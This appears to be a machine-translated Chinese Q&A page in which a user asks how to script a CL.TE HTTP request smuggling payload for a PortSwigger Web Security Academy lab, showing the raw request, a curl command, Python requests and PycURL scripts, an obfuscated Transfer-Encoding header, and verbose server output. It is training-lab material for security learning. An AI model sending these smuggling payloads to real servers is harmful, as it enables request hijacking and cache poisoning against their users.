Python中文网 - 问答频道, 解决您学习工作中的Python难题和Bug
Python常见问题
最近,我一直在尝试Portswiggers WebSeccademy的HTTP请求走私实验室,另外还有一个挑战,就是编写python脚本来完成这个挑战
打嗝中继器的预期解决方案:
POST / HTTP/1.1
Host: ac971f2f1fe48ec180f863d5009000ed.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 8
Transfer-Encoding: chunked
0
G
如果右键单击并选择“复制为卷曲命令”:
curl -i -s -k -X $'POST' \
-H $'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Length: 8' \
--data-binary $'0\x0d\x0a\x0d\x0aG\x0d\x0a\x0d\x0a' \
$'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'
尝试使用Curl执行此操作时,返回500内部服务器错误
我已经使用Python请求模块完成了这项工作:
def POST_CLTE():
url = 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'
headers = {'Host':'ac011f9b1f7e242780ce2272008a009d.web-security-academy.net','Connection':'keep-alive',
'Content-Type':'application/x-www-form-urlencoded','Content-Length':'8', 'Transfer-Encoding':'chunked'}
data = '0\x0d\x0a\x0d\x0aG\x0d\x0a'
s = requests.Session()
r = requests.Request('POST', url, headers=headers, data=data)
prepared = r.prepare()
response = s.send(prepared)
print(response.request.headers)
print(response.status_code)
print(response.text)
但我不喜欢这样,我必须将标题作为dict传递进来,当我想要包含一个模糊的标题时,它会抱怨,例如:
X: X[\n]Transfer-Encoding: chunked
我已尝试使用PyCurl复制请求:
#!/usr/bin/python
import pycurl
from StringIO import StringIO
buffer = StringIO()
c = pycurl.Curl()
c.setopt(c.POST, 1)
c.setopt(c.URL, 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/')
c.setopt(c.POSTFIELDS, '0\x0d\x0a\x0d\x0aG\x0d\x0a')
#c.setopt(pycurl.POSTFIELDSIZE, 8)
c.setopt(c.HTTPHEADER, [
'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0',
'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net',
'Content-Length: 8',
'Transfer-Encoding: chunked',
'Content-Type: application/x-www-form-urlencoded'
])
#c.setopt(c.CRLF, 1)
c.setopt(c.VERBOSE, 1)
c.setopt(c.HEADER, 1)
c.setopt(c.WRITEDATA, buffer)
c.perform()
c.close()
body = buffer.getvalue()
print(body)
我喜欢将头作为字符串数组传递,但不幸的是,我仍然收到500个内部服务器错误:
* Trying 18.200.141.238:443...
* TCP_NODELAY set
* Connected to ac561fd21ed819768081009200f2002e.web-security-academy.net (18.200.141.238) port 443 (#0)
* found 387 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
* server certificate verification OK
* server certificate status verification SKIPPED
* common name: web-security-academy.net (matched)
* server certificate expiration date OK
* server certificate activation date OK
* certificate public key: RSA
* certificate version: #3
* subject: CN=web-security-academy.net
* start date: Fri, 05 Jul 2019 00:00:00 GMT
* expire date: Wed, 05 Aug 2020 12:00:00 GMT
* issuer: C=US,O=Amazon,OU=Server CA 1B,CN=Amazon
* ALPN, server did not agree to a protocol
> POST / HTTP/1.1
Host: ac561fd21ed819768081009200f2002e.web-security-academy.net
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Length: 8
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
8
* upload completely sent off: 15 out of 8 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 Internal Server Error
< Content-Type: application/json; charset=utf-8
< Connection: close
< Content-Length: 23
<
* Closing connection 0
HTTP/1.1 500 Internal Server Error
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 23
"Internal Server Error"
这种行为的原因是什么?有没有其他我没有探索过的选择?任何建议都将不胜感激
Tags: webnetapplicationcertificatecontentpostlengthencoding
热门问题
- 文本导入时标题行中的特殊字符
- 文本小部件:在没有输入时更新并在循环后保持空闲
- 文本小部件tkin
- 文本小部件tkinter中的标签更改或文本外观更改是否有撤消功能?
- 文本小部件tkinter复制图像选项
- 文本小部件上的Python Tkinter ttk滚动条未缩放
- 文本小部件上的滚动条可能需要根据制表符ord显示前进行滚动
- 文本小部件不显示lis中的内容
- 文本小部件不显示Unicode字符
- 文本小部件中写入的行间距
- 文本小部件中的文本作为变量
- 文本小部件中的滚动条仅显示在底部
- 文本小部件中的选项卡键空间计数
- 文本小部件作为Lis
- 文本小部件在主框架中扩展列宽
- 文本小部件未使用删除功能清除
- 文本小部件滚动动画(Tkinter、Python)
- 文本居中。格式正确吗?
- 文本差分算法
- 文本已知时音频文件中的单词索引
热门文章
- Python覆盖写入文件
- 怎样创建一个 Python 列表?
- Python3 List append()方法使用
- 派森语言
- Python List pop()方法
- Python Django Web典型模块开发实战
- Python input() 函数
- Python3 列表(list) clear()方法
- Python游戏编程入门
- 如何创建一个空的set?
- python如何定义(创建)一个字符串
- Python标准库 [The Python Standard Library by Ex
- Python网络数据爬取及分析从入门到精通(分析篇)
- Python3 for 循环语句
- Python List insert() 方法
- Python 字典(Dictionary) update()方法
- Python编程无师自通 专业程序员的养成
- Python3 List count()方法
- Python 网络爬虫实战 [Web Crawler With Python]
- Python Cookbook(第2版)中文版
插座模块非常适合我。我觉得自己有点傻,没有尝试开始,但我学到了很多
代码:
相关问题 更多 >
编程相关推荐